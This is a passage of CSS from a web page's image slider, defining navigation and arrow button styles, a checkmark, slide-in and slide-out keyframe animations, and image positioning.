}

.slider_navigation {
  margin-top: 1rem;
  display: flex;
  flex-direction: row;
  height: 20px;
  justify-content: space-between;
  position: relative;
  width: 100%;
}



.autoplay-sub {
  float: left;
  line-height: 30px;
  font-size: 0.7rem;
}

.checkmark {
  float: left;
}

.checkmark:after {
  content: "";
  position: absolute;
  display: none;
  left: 11px;
  top: 7px;
  width: 5px;
  height: 10px;
  border: solid white;
  border-width: 0 3px 3px 0;
  -webkit-transform: rotate(45deg);
  transform: rotate(45deg);
}

.button-left:after,
.button-right:after {
  border: solid white;
  border-width: 0 3px 3px 0;
  content: "";
  display: block;
  height: 8px;
  position: absolute;
  width: 8px;
}

.button-left:after {
  left: 11px;
  top: 10px;
  -webkit-transform: rotate(135deg);
  transform: rotate(135deg);
}

.button-right:after {
  left: 7px;
  top: 10px;
  -webkit-transform: rotate(-45deg);
  transform: rotate(-45deg);
}



@-webkit-keyframes goInL {
  0% {
    left: -900px;
  }

  100% {
    left: 0;
  }
}

@keyframes goInL {
  0% {
    left: -900px;
  }

  100% {
    left: 0;
  }
}



@-webkit-keyframes goOutL {
  0% {
    left: 0;
  }

  100% {
    left: 900px;
  }
}

@keyframes goOutL {
  0% {
    left: 0;
  }

  100% {
    left: 900px;
  }
}


@-webkit-keyframes goInR {
  0% {
    left: 900px;
  }

  50% {
    left: 400px;
  }

  100% {
    left: 0;
  }
}

@keyframes goInR {
  0% {
    left: 900px;
  }

  50% {
    left: 400px;
  }

  100% {
    left: 0;
  }
}



@-webkit-keyframes goOutR {
  0% {
    left: 0;
  }

  50% {
    left: -450px;
  }

  100% {
    left: -900px;
  }
}

@keyframes goOutR {
  0% {
    left: 0;
  }

  50% {
    left: -450px;
  }

  100% {
    left: -900px;
  }
}

.pic {
  left: 0;
  height: 100%;
  -o-object-fit: cover;
  object-fit: cover;
  position: absolute;
  top: 0;
  width: 45%;
}

.pic:first-child {
  z-index: 100;
}</style>


